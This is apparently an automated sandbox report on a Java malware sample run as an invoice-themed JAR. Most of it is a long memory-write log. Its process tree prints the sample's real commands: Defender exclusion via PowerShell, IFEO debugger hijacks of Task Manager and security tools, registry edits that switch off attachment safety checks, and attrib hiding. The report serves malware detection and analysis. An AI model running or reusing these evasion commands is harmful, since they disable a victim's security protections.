PID 2728 wrote to memory of 2636	2728	cmd.exe	198
PID 2728 wrote to memory of 2032	2728	cmd.exe	199
PID 2728 wrote to memory of 2032	2728	cmd.exe	199
PID 2728 wrote to memory of 2032	2728	cmd.exe	199
PID 1424 wrote to memory of 2568	1424	java.exe	200
PID 1424 wrote to memory of 2568	1424	java.exe	200
PID 1424 wrote to memory of 2568	1424	java.exe	200
PID 2568 wrote to memory of 2732	2568	cmd.exe	201
PID 2568 wrote to memory of 2732	2568	cmd.exe	201
PID 2568 wrote to memory of 2732	2568	cmd.exe	201
PID 2568 wrote to memory of 2688	2568	cmd.exe	202
PID 2568 wrote to memory of 2688	2568	cmd.exe	202
PID 2568 wrote to memory of 2688	2568	cmd.exe	202
PID 1424 wrote to memory of 2100	1424	java.exe	203
PID 1424 wrote to memory of 2100	1424	java.exe	203
PID 1424 wrote to memory of 2100	1424	java.exe	203
PID 2100 wrote to memory of 2800	2100	cmd.exe	204
PID 2100 wrote to memory of 2800	2100	cmd.exe	204
PID 2100 wrote to memory of 2800	2100	cmd.exe	204
PID 2100 wrote to memory of 2788	2100	cmd.exe	205
PID 2100 wrote to memory of 2788	2100	cmd.exe	205
PID 2100 wrote to memory of 2788	2100	cmd.exe	205
PID 1424 wrote to memory of 2864	1424	java.exe	206
PID 1424 wrote to memory of 2864	1424	java.exe	206
PID 1424 wrote to memory of 2864	1424	java.exe	206
PID 2864 wrote to memory of 2816	2864	cmd.exe	207
PID 2864 wrote to memory of 2816	2864	cmd.exe	207
PID 2864 wrote to memory of 2816	2864	cmd.exe	207
PID 2864 wrote to memory of 2884	2864	cmd.exe	208
PID 2864 wrote to memory of 2884	2864	cmd.exe	208
PID 2864 wrote to memory of 2884	2864	cmd.exe	208
PID 1424 wrote to memory of 2900	1424	java.exe	209
PID 1424 wrote to memory of 2900	1424	java.exe	209
PID 1424 wrote to memory of 2900	1424	java.exe	209
PID 2900 wrote to memory of 2896	2900	cmd.exe	210
PID 2900 wrote to memory of 2896	2900	cmd.exe	210
PID 2900 wrote to memory of 2896	2900	cmd.exe	210
PID 2900 wrote to memory of 2524	2900	cmd.exe	211
PID 2900 wrote to memory of 2524	2900	cmd.exe	211
PID 2900 wrote to memory of 2524	2900	cmd.exe	211
PID 1424 wrote to memory of 2740	1424	java.exe	212
PID 1424 wrote to memory of 2740	1424	java.exe	212
PID 1424 wrote to memory of 2740	1424	java.exe	212
PID 2740 wrote to memory of 2512	2740	cmd.exe	213
PID 2740 wrote to memory of 2512	2740	cmd.exe	213
PID 2740 wrote to memory of 2512	2740	cmd.exe	213
PID 2740 wrote to memory of 1372	2740	cmd.exe	214
PID 2740 wrote to memory of 1372	2740	cmd.exe	214
PID 2740 wrote to memory of 1372	2740	cmd.exe	214
PID 1424 wrote to memory of 2952	1424	java.exe	215
PID 1424 wrote to memory of 2952	1424	java.exe	215
PID 1424 wrote to memory of 2952	1424	java.exe	215
PID 2952 wrote to memory of 2976	2952	cmd.exe	216
PID 2952 wrote to memory of 2976	2952	cmd.exe	216
PID 2952 wrote to memory of 2976	2952	cmd.exe	216
PID 2952 wrote to memory of 3000	2952	cmd.exe	217
PID 2952 wrote to memory of 3000	2952	cmd.exe	217
PID 2952 wrote to memory of 3000	2952	cmd.exe	217
PID 1424 wrote to memory of 3008	1424	java.exe	218
PID 1424 wrote to memory of 3008	1424	java.exe	218
PID 1424 wrote to memory of 3008	1424	java.exe	218
PID 3008 wrote to memory of 3032	3008	cmd.exe	219
PID 3008 wrote to memory of 3032	3008	cmd.exe	219
PID 3008 wrote to memory of 3032	3008	cmd.exe	219
PID 3008 wrote to memory of 3012	3008	cmd.exe	220
PID 3008 wrote to memory of 3012	3008	cmd.exe	220
PID 3008 wrote to memory of 3012	3008	cmd.exe	220
PID 1424 wrote to memory of 1672	1424	java.exe	221
PID 1424 wrote to memory of 1672	1424	java.exe	221
PID 1424 wrote to memory of 1672	1424	java.exe	221
PID 1672 wrote to memory of 3048	1672	cmd.exe	222
PID 1672 wrote to memory of 3048	1672	cmd.exe	222
PID 1672 wrote to memory of 3048	1672	cmd.exe	222
PID 1672 wrote to memory of 2096	1672	cmd.exe	223
PID 1672 wrote to memory of 2096	1672	cmd.exe	223
PID 1672 wrote to memory of 2096	1672	cmd.exe	223
PID 1424 wrote to memory of 2164	1424	java.exe	224
PID 1424 wrote to memory of 2164	1424	java.exe	224
PID 1424 wrote to memory of 2164	1424	java.exe	224
PID 2164 wrote to memory of 568	2164	cmd.exe	225
PID 2164 wrote to memory of 568	2164	cmd.exe	225
PID 2164 wrote to memory of 568	2164	cmd.exe	225
PID 1424 wrote to memory of 2212	1424	java.exe	226
PID 1424 wrote to memory of 2212	1424	java.exe	226
PID 1424 wrote to memory of 2212	1424	java.exe	226
PID 2164 wrote to memory of 2060	2164	cmd.exe	228
PID 2164 wrote to memory of 2060	2164	cmd.exe	228
PID 2164 wrote to memory of 2060	2164	cmd.exe	228
PID 1424 wrote to memory of 512	1424	java.exe	229
PID 1424 wrote to memory of 512	1424	java.exe	229
PID 1424 wrote to memory of 512	1424	java.exe	229
PID 512 wrote to memory of 2584	512	cmd.exe	230
PID 512 wrote to memory of 2584	512	cmd.exe	230
PID 512 wrote to memory of 2584	512	cmd.exe	230
PID 512 wrote to memory of 1872	512	cmd.exe	231
PID 512 wrote to memory of 1872	512	cmd.exe	231
PID 512 wrote to memory of 1872	512	cmd.exe	231
PID 1424 wrote to memory of 2352	1424	java.exe	232
PID 1424 wrote to memory of 2352	1424	java.exe	232
PID 1424 wrote to memory of 2352	1424	java.exe	232
PID 2352 wrote to memory of 2648	2352	cmd.exe	233
PID 2352 wrote to memory of 2648	2352	cmd.exe	233
PID 2352 wrote to memory of 2648	2352	cmd.exe	233
PID 2352 wrote to memory of 1836	2352	cmd.exe	234
PID 2352 wrote to memory of 1836	2352	cmd.exe	234
PID 2352 wrote to memory of 1836	2352	cmd.exe	234
PID 1424 wrote to memory of 2556	1424	java.exe	235
PID 1424 wrote to memory of 2556	1424	java.exe	235
PID 1424 wrote to memory of 2556	1424	java.exe	235
PID 2556 wrote to memory of 2600	2556	cmd.exe	236
PID 2556 wrote to memory of 2600	2556	cmd.exe	236
PID 2556 wrote to memory of 2600	2556	cmd.exe	236
PID 2556 wrote to memory of 2372	2556	cmd.exe	237
PID 2556 wrote to memory of 2372	2556	cmd.exe	237
PID 2556 wrote to memory of 2372	2556	cmd.exe	237
PID 1424 wrote to memory of 1540	1424	java.exe	238
PID 1424 wrote to memory of 1540	1424	java.exe	238
PID 1424 wrote to memory of 1540	1424	java.exe	238
PID 1540 wrote to memory of 2404	1540	cmd.exe	239
PID 1540 wrote to memory of 2404	1540	cmd.exe	239
PID 1540 wrote to memory of 2404	1540	cmd.exe	239
PID 1540 wrote to memory of 2576	1540	cmd.exe	240
PID 1540 wrote to memory of 2576	1540	cmd.exe	240
PID 1540 wrote to memory of 2576	1540	cmd.exe	240
PID 1424 wrote to memory of 392	1424	java.exe	241
PID 1424 wrote to memory of 392	1424	java.exe	241
PID 1424 wrote to memory of 392	1424	java.exe	241
PID 392 wrote to memory of 832	392	cmd.exe	242
PID 392 wrote to memory of 832	392	cmd.exe	242
PID 392 wrote to memory of 832	392	cmd.exe	242
PID 392 wrote to memory of 1932	392	cmd.exe	243
PID 392 wrote to memory of 1932	392	cmd.exe	243
PID 392 wrote to memory of 1932	392	cmd.exe	243
PID 1424 wrote to memory of 428	1424	java.exe	244
PID 1424 wrote to memory of 428	1424	java.exe	244
PID 1424 wrote to memory of 428	1424	java.exe	244
PID 428 wrote to memory of 268	428	cmd.exe	245
PID 428 wrote to memory of 268	428	cmd.exe	245
PID 428 wrote to memory of 268	428	cmd.exe	245
PID 428 wrote to memory of 3068	428	cmd.exe	246
PID 428 wrote to memory of 3068	428	cmd.exe	246
PID 428 wrote to memory of 3068	428	cmd.exe	246
PID 1424 wrote to memory of 3016	1424	java.exe	247
PID 1424 wrote to memory of 3016	1424	java.exe	247
PID 1424 wrote to memory of 3016	1424	java.exe	247
PID 3016 wrote to memory of 2988	3016	cmd.exe	248
PID 3016 wrote to memory of 2988	3016	cmd.exe	248
PID 3016 wrote to memory of 2988	3016	cmd.exe	248
PID 3016 wrote to memory of 2012	3016	cmd.exe	249
PID 3016 wrote to memory of 2012	3016	cmd.exe	249
PID 3016 wrote to memory of 2012	3016	cmd.exe	249
PID 1424 wrote to memory of 2024	1424	java.exe	250
PID 1424 wrote to memory of 2024	1424	java.exe	250
PID 1424 wrote to memory of 2024	1424	java.exe	250
PID 2024 wrote to memory of 1504	2024	cmd.exe	251
PID 2024 wrote to memory of 1504	2024	cmd.exe	251
PID 2024 wrote to memory of 1504	2024	cmd.exe	251
PID 2024 wrote to memory of 1704	2024	cmd.exe	252
PID 2024 wrote to memory of 1704	2024	cmd.exe	252
PID 2024 wrote to memory of 1704	2024	cmd.exe	252
PID 1424 wrote to memory of 2084	1424	java.exe	253
PID 1424 wrote to memory of 2084	1424	java.exe	253
PID 1424 wrote to memory of 2084	1424	java.exe	253
PID 2084 wrote to memory of 2040	2084	cmd.exe	254
PID 2084 wrote to memory of 2040	2084	cmd.exe	254
PID 2084 wrote to memory of 2040	2084	cmd.exe	254
PID 2084 wrote to memory of 1080	2084	cmd.exe	255
PID 2084 wrote to memory of 1080	2084	cmd.exe	255
PID 2084 wrote to memory of 1080	2084	cmd.exe	255
PID 1424 wrote to memory of 1284	1424	java.exe	256
PID 1424 wrote to memory of 1284	1424	java.exe	256
PID 1424 wrote to memory of 1284	1424	java.exe	256
PID 1284 wrote to memory of 1980	1284	cmd.exe	257
PID 1284 wrote to memory of 1980	1284	cmd.exe	257
PID 1284 wrote to memory of 1980	1284	cmd.exe	257
PID 1284 wrote to memory of 1884	1284	cmd.exe	258
PID 1284 wrote to memory of 1884	1284	cmd.exe	258
PID 1284 wrote to memory of 1884	1284	cmd.exe	258
PID 1424 wrote to memory of 2016	1424	java.exe	259
PID 1424 wrote to memory of 2016	1424	java.exe	259
PID 1424 wrote to memory of 2016	1424	java.exe	259
PID 2016 wrote to memory of 2300	2016	cmd.exe	260
PID 2016 wrote to memory of 2300	2016	cmd.exe	260
PID 2016 wrote to memory of 2300	2016	cmd.exe	260
PID 2016 wrote to memory of 2204	2016	cmd.exe	261
PID 2016 wrote to memory of 2204	2016	cmd.exe	261
PID 2016 wrote to memory of 2204	2016	cmd.exe	261
PID 1424 wrote to memory of 1888	1424	java.exe	262
PID 1424 wrote to memory of 1888	1424	java.exe	262
PID 1424 wrote to memory of 1888	1424	java.exe	262
PID 1888 wrote to memory of 2324	1888	cmd.exe	263
PID 1888 wrote to memory of 2324	1888	cmd.exe	263
PID 1888 wrote to memory of 2324	1888	cmd.exe	263
PID 1888 wrote to memory of 2264	1888	cmd.exe	264
PID 1888 wrote to memory of 2264	1888	cmd.exe	264
PID 1888 wrote to memory of 2264	1888	cmd.exe	264
PID 1424 wrote to memory of 2360	1424	java.exe	265
PID 1424 wrote to memory of 2360	1424	java.exe	265
PID 1424 wrote to memory of 2360	1424	java.exe	265
PID 2360 wrote to memory of 2460	2360	cmd.exe	266
PID 2360 wrote to memory of 2460	2360	cmd.exe	266
PID 2360 wrote to memory of 2460	2360	cmd.exe	266
PID 2360 wrote to memory of 2552	2360	cmd.exe	267
PID 2360 wrote to memory of 2552	2360	cmd.exe	267
PID 2360 wrote to memory of 2552	2360	cmd.exe	267
PID 1424 wrote to memory of 2080	1424	java.exe	268
PID 1424 wrote to memory of 2080	1424	java.exe	268
PID 1424 wrote to memory of 2080	1424	java.exe	268
PID 2080 wrote to memory of 1388	2080	cmd.exe	269
PID 2080 wrote to memory of 1388	2080	cmd.exe	269
PID 2080 wrote to memory of 1388	2080	cmd.exe	269
PID 2080 wrote to memory of 3024	2080	cmd.exe	270
PID 2080 wrote to memory of 3024	2080	cmd.exe	270
PID 2080 wrote to memory of 3024	2080	cmd.exe	270
PID 1424 wrote to memory of 2140	1424	java.exe	271
PID 1424 wrote to memory of 2140	1424	java.exe	271
PID 1424 wrote to memory of 2140	1424	java.exe	271
PID 2140 wrote to memory of 2256	2140	cmd.exe	272
PID 2140 wrote to memory of 2256	2140	cmd.exe	272
PID 2140 wrote to memory of 2256	2140	cmd.exe	272
PID 2140 wrote to memory of 2384	2140	cmd.exe	273
PID 2140 wrote to memory of 2384	2140	cmd.exe	273
PID 2140 wrote to memory of 2384	2140	cmd.exe	273
PID 1424 wrote to memory of 2276	1424	java.exe	274
PID 1424 wrote to memory of 2276	1424	java.exe	274
PID 1424 wrote to memory of 2276	1424	java.exe	274
PID 2276 wrote to memory of 380	2276	cmd.exe	275
PID 2276 wrote to memory of 380	2276	cmd.exe	275
PID 2276 wrote to memory of 380	2276	cmd.exe	275
PID 1424 wrote to memory of 856	1424	java.exe	276
PID 1424 wrote to memory of 856	1424	java.exe	276
PID 1424 wrote to memory of 856	1424	java.exe	276
PID 2276 wrote to memory of 2420	2276	cmd.exe	278
PID 2276 wrote to memory of 2420	2276	cmd.exe	278
PID 2276 wrote to memory of 2420	2276	cmd.exe	278
PID 1424 wrote to memory of 2132	1424	java.exe	279
PID 1424 wrote to memory of 2132	1424	java.exe	279
PID 1424 wrote to memory of 2132	1424	java.exe	279
PID 2132 wrote to memory of 1496	2132	cmd.exe	280
PID 2132 wrote to memory of 1496	2132	cmd.exe	280
PID 2132 wrote to memory of 1496	2132	cmd.exe	280
PID 2132 wrote to memory of 1056	2132	cmd.exe	281
PID 2132 wrote to memory of 1056	2132	cmd.exe	281
PID 2132 wrote to memory of 1056	2132	cmd.exe	281
PID 1424 wrote to memory of 644	1424	java.exe	282
PID 1424 wrote to memory of 644	1424	java.exe	282
PID 1424 wrote to memory of 644	1424	java.exe	282
PID 644 wrote to memory of 2436	644	cmd.exe	283
PID 644 wrote to memory of 2436	644	cmd.exe	283
PID 644 wrote to memory of 2436	644	cmd.exe	283
PID 644 wrote to memory of 2232	644	cmd.exe	284
PID 644 wrote to memory of 2232	644	cmd.exe	284
PID 644 wrote to memory of 2232	644	cmd.exe	284
PID 1424 wrote to memory of 2252	1424	java.exe	285
PID 1424 wrote to memory of 2252	1424	java.exe	285
PID 1424 wrote to memory of 2252	1424	java.exe	285
PID 2252 wrote to memory of 2500	2252	cmd.exe	286
PID 2252 wrote to memory of 2500	2252	cmd.exe	286
PID 2252 wrote to memory of 2500	2252	cmd.exe	286
PID 2252 wrote to memory of 2304	2252	cmd.exe	287
PID 2252 wrote to memory of 2304	2252	cmd.exe	287
PID 2252 wrote to memory of 2304	2252	cmd.exe	287
PID 1424 wrote to memory of 2488	1424	java.exe	288
PID 1424 wrote to memory of 2488	1424	java.exe	288
PID 1424 wrote to memory of 2488	1424	java.exe	288
PID 2488 wrote to memory of 2328	2488	cmd.exe	289
PID 2488 wrote to memory of 2328	2488	cmd.exe	289
PID 2488 wrote to memory of 2328	2488	cmd.exe	289
PID 2488 wrote to memory of 2272	2488	cmd.exe	290
PID 2488 wrote to memory of 2272	2488	cmd.exe	290
PID 2488 wrote to memory of 2272	2488	cmd.exe	290
PID 1424 wrote to memory of 2700	1424	java.exe	291
PID 1424 wrote to memory of 2700	1424	java.exe	291
PID 1424 wrote to memory of 2700	1424	java.exe	291
PID 2700 wrote to memory of 1464	2700	cmd.exe	292
PID 2700 wrote to memory of 1464	2700	cmd.exe	292
PID 2700 wrote to memory of 1464	2700	cmd.exe	292
PID 2700 wrote to memory of 2640	2700	cmd.exe	293
PID 2700 wrote to memory of 2640	2700	cmd.exe	293
PID 2700 wrote to memory of 2640	2700	cmd.exe	293
PID 1424 wrote to memory of 1400	1424	java.exe	294
PID 1424 wrote to memory of 1400	1424	java.exe	294
PID 1424 wrote to memory of 1400	1424	java.exe	294
PID 1400 wrote to memory of 2712	1400	cmd.exe	295
PID 1400 wrote to memory of 2712	1400	cmd.exe	295
PID 1400 wrote to memory of 2712	1400	cmd.exe	295
PID 1400 wrote to memory of 2652	1400	cmd.exe	296
PID 1400 wrote to memory of 2652	1400	cmd.exe	296
PID 1400 wrote to memory of 2652	1400	cmd.exe	296
PID 1424 wrote to memory of 1992	1424	java.exe	297
PID 1424 wrote to memory of 1992	1424	java.exe	297
PID 1424 wrote to memory of 1992	1424	java.exe	297
PID 1992 wrote to memory of 2672	1992	cmd.exe	298
PID 1992 wrote to memory of 2672	1992	cmd.exe	298
PID 1992 wrote to memory of 2672	1992	cmd.exe	298
PID 1992 wrote to memory of 2484	1992	cmd.exe	299
PID 1992 wrote to memory of 2484	1992	cmd.exe	299
PID 1992 wrote to memory of 2484	1992	cmd.exe	299
PID 1424 wrote to memory of 1124	1424	java.exe	300
PID 1424 wrote to memory of 1124	1424	java.exe	300
PID 1424 wrote to memory of 1124	1424	java.exe	300
PID 1124 wrote to memory of 2032	1124	cmd.exe	301
PID 1124 wrote to memory of 2032	1124	cmd.exe	301
PID 1124 wrote to memory of 2032	1124	cmd.exe	301
PID 1124 wrote to memory of 2068	1124	cmd.exe	302
PID 1124 wrote to memory of 2068	1124	cmd.exe	302
PID 1124 wrote to memory of 2068	1124	cmd.exe	302
PID 1424 wrote to memory of 1436	1424	java.exe	303
PID 1424 wrote to memory of 1436	1424	java.exe	303
PID 1424 wrote to memory of 1436	1424	java.exe	303
PID 1436 wrote to memory of 1868	1436	cmd.exe	304
PID 1436 wrote to memory of 1868	1436	cmd.exe	304
PID 1436 wrote to memory of 1868	1436	cmd.exe	304
PID 1436 wrote to memory of 340	1436	cmd.exe	305
PID 1436 wrote to memory of 340	1436	cmd.exe	305
PID 1436 wrote to memory of 340	1436	cmd.exe	305
PID 1424 wrote to memory of 1308	1424	java.exe	306
PID 1424 wrote to memory of 1308	1424	java.exe	306
PID 1424 wrote to memory of 1308	1424	java.exe	306
PID 1308 wrote to memory of 2784	1308	cmd.exe	307
PID 1308 wrote to memory of 2784	1308	cmd.exe	307
PID 1308 wrote to memory of 2784	1308	cmd.exe	307
PID 1308 wrote to memory of 2764	1308	cmd.exe	308
PID 1308 wrote to memory of 2764	1308	cmd.exe	308
PID 1308 wrote to memory of 2764	1308	cmd.exe	308
PID 1424 wrote to memory of 2688	1424	java.exe	309
PID 1424 wrote to memory of 2688	1424	java.exe	309
PID 1424 wrote to memory of 2688	1424	java.exe	309
PID 2688 wrote to memory of 2768	2688	cmd.exe	310
PID 2688 wrote to memory of 2768	2688	cmd.exe	310
PID 2688 wrote to memory of 2768	2688	cmd.exe	310
PID 2688 wrote to memory of 2812	2688	cmd.exe	311
PID 2688 wrote to memory of 2812	2688	cmd.exe	311
PID 2688 wrote to memory of 2812	2688	cmd.exe	311
PID 1424 wrote to memory of 2888	1424	java.exe	312
PID 1424 wrote to memory of 2888	1424	java.exe	312
PID 1424 wrote to memory of 2888	1424	java.exe	312
PID 2888 wrote to memory of 2816	2888	cmd.exe	313
PID 2888 wrote to memory of 2816	2888	cmd.exe	313
PID 2888 wrote to memory of 2816	2888	cmd.exe	313
PID 2888 wrote to memory of 2912	2888	cmd.exe	314
PID 2888 wrote to memory of 2912	2888	cmd.exe	314
PID 2888 wrote to memory of 2912	2888	cmd.exe	314
PID 1424 wrote to memory of 2868	1424	java.exe	315
PID 1424 wrote to memory of 2868	1424	java.exe	315
PID 1424 wrote to memory of 2868	1424	java.exe	315
PID 2868 wrote to memory of 2524	2868	cmd.exe	316
PID 2868 wrote to memory of 2524	2868	cmd.exe	316
PID 2868 wrote to memory of 2524	2868	cmd.exe	316
PID 2868 wrote to memory of 2808	2868	cmd.exe	317
PID 2868 wrote to memory of 2808	2868	cmd.exe	317
PID 2868 wrote to memory of 2808	2868	cmd.exe	317
PID 1424 wrote to memory of 916	1424	java.exe	318
PID 1424 wrote to memory of 916	1424	java.exe	318
PID 1424 wrote to memory of 916	1424	java.exe	318
PID 916 wrote to memory of 2928	916	cmd.exe	319
PID 916 wrote to memory of 2928	916	cmd.exe	319
PID 916 wrote to memory of 2928	916	cmd.exe	319
PID 916 wrote to memory of 2976	916	cmd.exe	320
PID 916 wrote to memory of 2976	916	cmd.exe	320
PID 916 wrote to memory of 2976	916	cmd.exe	320
PID 1424 wrote to memory of 2992	1424	java.exe	321
PID 1424 wrote to memory of 2992	1424	java.exe	321
PID 1424 wrote to memory of 2992	1424	java.exe	321
PID 2992 wrote to memory of 764	2992	cmd.exe	322
PID 2992 wrote to memory of 764	2992	cmd.exe	322
PID 2992 wrote to memory of 764	2992	cmd.exe	322
PID 2992 wrote to memory of 3012	2992	cmd.exe	323
PID 2992 wrote to memory of 3012	2992	cmd.exe	323
PID 2992 wrote to memory of 3012	2992	cmd.exe	323
PID 1424 wrote to memory of 2120	1424	java.exe	324
PID 1424 wrote to memory of 2120	1424	java.exe	324
PID 1424 wrote to memory of 2120	1424	java.exe	324
PID 2120 wrote to memory of 2076	2120	cmd.exe	325
PID 2120 wrote to memory of 2076	2120	cmd.exe	325
PID 2120 wrote to memory of 2076	2120	cmd.exe	325
PID 2120 wrote to memory of 2200	2120	cmd.exe	326
PID 2120 wrote to memory of 2200	2120	cmd.exe	326
PID 2120 wrote to memory of 2200	2120	cmd.exe	326
PID 1424 wrote to memory of 2196	1424	java.exe	327
PID 1424 wrote to memory of 2196	1424	java.exe	327
PID 1424 wrote to memory of 2196	1424	java.exe	327
PID 2196 wrote to memory of 2292	2196	cmd.exe	328
PID 2196 wrote to memory of 2292	2196	cmd.exe	328
PID 2196 wrote to memory of 2292	2196	cmd.exe	328
PID 2196 wrote to memory of 2564	2196	cmd.exe	329
PID 2196 wrote to memory of 2564	2196	cmd.exe	329
PID 2196 wrote to memory of 2564	2196	cmd.exe	329
PID 1424 wrote to memory of 2836	1424	java.exe	330
PID 1424 wrote to memory of 2836	1424	java.exe	330
PID 1424 wrote to memory of 2836	1424	java.exe	330
PID 1424 wrote to memory of 2348	1424	java.exe	332
PID 1424 wrote to memory of 2348	1424	java.exe	332
PID 1424 wrote to memory of 2348	1424	java.exe	332
PID 1424 wrote to memory of 2540	1424	java.exe	334
PID 1424 wrote to memory of 2540	1424	java.exe	334
PID 1424 wrote to memory of 2540	1424	java.exe	334
PID 1424 wrote to memory of 1932	1424	java.exe	336
PID 1424 wrote to memory of 1932	1424	java.exe	336
PID 1424 wrote to memory of 1932	1424	java.exe	336
PID 1424 wrote to memory of 2988	1424	java.exe	338
PID 1424 wrote to memory of 2988	1424	java.exe	338
PID 1424 wrote to memory of 2988	1424	java.exe	338
PID 1424 wrote to memory of 1012	1424	java.exe	340
PID 1424 wrote to memory of 1012	1424	java.exe	340
PID 1424 wrote to memory of 1012	1424	java.exe	340
PID 1424 wrote to memory of 2416	1424	java.exe	342
PID 1424 wrote to memory of 2416	1424	java.exe	342
PID 1424 wrote to memory of 2416	1424	java.exe	342
PID 1424 wrote to memory of 2136	1424	java.exe	344
PID 1424 wrote to memory of 2136	1424	java.exe	344
PID 1424 wrote to memory of 2136	1424	java.exe	344
PID 1424 wrote to memory of 3024	1424	java.exe	346
PID 1424 wrote to memory of 3024	1424	java.exe	346
PID 1424 wrote to memory of 3024	1424	java.exe	346

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1312	attrib.exe
520	attrib.exe
1672	attrib.exe
544	attrib.exe
1276	attrib.exe
764	attrib.exe
724	attrib.exe
1496	attrib.exe

C:\Windows\system32\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\Invoice_.jar
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1424
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1876
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1980
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2040
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1988
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1896
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:1312
- C:\Windows\system32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:520
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\bTTIR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1672
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\bTTIR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:544
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\bTTIR
  2⤵
  - Views/modifies file attributes
  PID:1276
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\bTTIR
  2⤵
  - Views/modifies file attributes
  PID:764
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\bTTIR
  2⤵
  - Views/modifies file attributes
  PID:724
- C:\Windows\system32\attrib.exe
  attrib +h +s +r C:\Users\Admin\bTTIR\SOAqQ.class
  2⤵
  - Views/modifies file attributes
  PID:1496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\bTTIR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\bTTIR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1412
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:2356
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1608
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:884
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:608
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1124
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:1800
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:1764
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2000
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2004
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:2040
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1052
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:272
- C:\Windows\System32\reg.exe
